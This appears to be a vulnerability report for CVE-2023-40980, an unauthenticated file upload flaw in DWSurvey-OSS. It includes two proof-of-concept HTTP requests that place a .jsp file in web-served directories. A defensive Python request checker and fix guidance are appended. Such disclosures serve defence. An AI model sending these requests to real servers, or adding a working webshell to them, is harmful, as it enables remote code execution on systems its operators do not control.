CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and saveFile in the action/UploadAction.java file.


The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization.

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution.

```http
POST /diaowen/up/upload!saveimage.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
```

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded for remote code execution.

```http
POST /diaowen/up/upload!saveFile.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="basepath"

files
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
```
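A defender-side check for the request shape shown in the two samples above, added here as an example and not part of the original report or the DWSurvey code base. It parses a captured request to either upload action and flags a missing session cookie, a part filename whose extension is not an image type, and a part filename that disagrees with the `uploadifyFileName` field. The function names, the image allowlist, the cookie heuristic and the host `survey.example` are assumptions.

```python
import email.policy
import posixpath
import re

# Action paths come from the report; the image allowlist is an assumption.
UPLOAD_ACTION = re.compile(r"/up/upload!(saveimage|saveFile)\.action$")
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}

def ext(name):
    return posixpath.splitext(name or "")[1].lower()

def inspect_upload(raw):
    """Return a list of findings for one captured HTTP request (bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path = lines[0].split(" ")[:2]
    if method != "POST" or not UPLOAD_ACTION.search(path.split("?")[0]):
        return []
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    findings = []
    if "cookie" not in headers:  # heuristic: no session presented at all
        findings.append("upload action called without a session cookie")
    # Let the stdlib MIME parser split the multipart/form-data body.
    mime = b"Content-Type: " + headers.get("content-type", "").encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(mime, policy=email.policy.default)
    fields, part_name = {}, None
    for part in msg.iter_parts():
        if part.get_filename() is not None:
            part_name = part.get_filename()
        else:
            key = part.get_param("name", header="content-disposition")
            fields[key] = part.get_payload(decode=True).decode("latin-1").strip()
    if part_name is not None and ext(part_name) not in IMAGE_EXTS:
        findings.append(f"part filename extension {ext(part_name)!r} is not an image type")
    claimed = fields.get("uploadifyFileName")
    if part_name and claimed and ext(claimed) != ext(part_name):
        findings.append(f"filename {part_name!r} disagrees with uploadifyFileName {claimed!r}")
    return findings

def sample_request(action, filename, cookie=None):
    """Constructed request modelled on the report's layout (host is a placeholder)."""
    b = "----WebKitFormBoundary12345abcde"
    body = (f"--{b}\r\nContent-Disposition: form-data; name=\"uploadify\"; filename=\"{filename}\"\r\n"
            f"Content-Type: image/jpeg\r\n\r\ntestnixxx\r\n"
            f"--{b}\r\nContent-Disposition: form-data; name=\"uploadifyFileName\"\r\n\r\n1.jpg\r\n--{b}--\r\n")
    head = (f"POST /diaowen/up/upload!{action}.action HTTP/1.1\r\nHost: survey.example\r\n"
            + (f"Cookie: {cookie}\r\n" if cookie else "")
            + f"Content-Type: multipart/form-data; boundary={b}\r\n\r\n")
    return (head + body).encode()
```

The same three conditions are what a server-side fix would enforce before writing anything under `/file`: an authenticated session, an extension allowlist applied to the name actually stored, and no trust in client-supplied name or type fields.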
